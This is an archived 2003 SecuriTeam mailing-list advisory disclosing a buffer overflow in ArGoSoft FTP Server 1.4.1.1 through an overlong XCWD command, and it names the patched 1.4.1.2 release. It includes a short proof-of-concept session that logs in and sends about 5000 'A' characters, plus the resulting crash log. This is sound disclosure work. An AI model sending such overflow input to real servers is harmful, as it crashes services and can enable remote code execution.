[NT] ArGoSoft FTP Server XCMD Buffer Overflow

• Previous message: SecuriTeam: "[NT] mIRC USERHOST Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 29 Sep 2003 14:21:57 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  ArGoSoft FTP Server XCMD Buffer Overflow
------------------------------------------------------------------------

SUMMARY

 <http://www.argosoft.com/applications/ftpserver/> ArGoSoft FTP Server is
"a FTP server for Windows95/98/NT, and supports all basic FTP commands,
and much more, such as passive mode, resuming file transfers, windows
shortcuts to another files, folders and drives (including network drives),
virtual domains (multiple IP homes), IP filtering, site specific commands,
such as compressing and copying files on the server, changing date/time
stamps, and so on".

A buffer overflow vulnerability exists in the product that allows remote
attackers to overflow an internal buffer, causing the product to execute
arbitrary code.

DETAILS

Vulnerable systems:
 * ArGoSoft FTP Server version 1.4 (1.4.1.1)

Immune systems:
 * ArGoSoft FTP Server version 1.4 (1.4.1.2)

Example:
c:\> putty.exe localhost 21
220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
user ftp
502 Unknown command
user ftp
331 User name OK, need password
pass ftp
230 User ftp logged in successfully **
XCWD AAAAAAA....(5000 times)
client closed connection.

In the log file you will you will see something like:
9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32
in module 'ftpsrvnt.exe'. Write of address 41414145

Vendor response:
ArGoSoft has confirmed that there is a bug in the product. Version 1.4.1.2
has been released, it can be downloaded from:
<http://www.argosoft.com/applications/ftpserver/download.asp>
http://www.argosoft.com/applications/ftpserver/download.asp.

ADDITIONAL INFORMATION

The information has been provided by <mailto:moran@moozatech.com> Moran
Zavdi.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] mIRC USERHOST Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]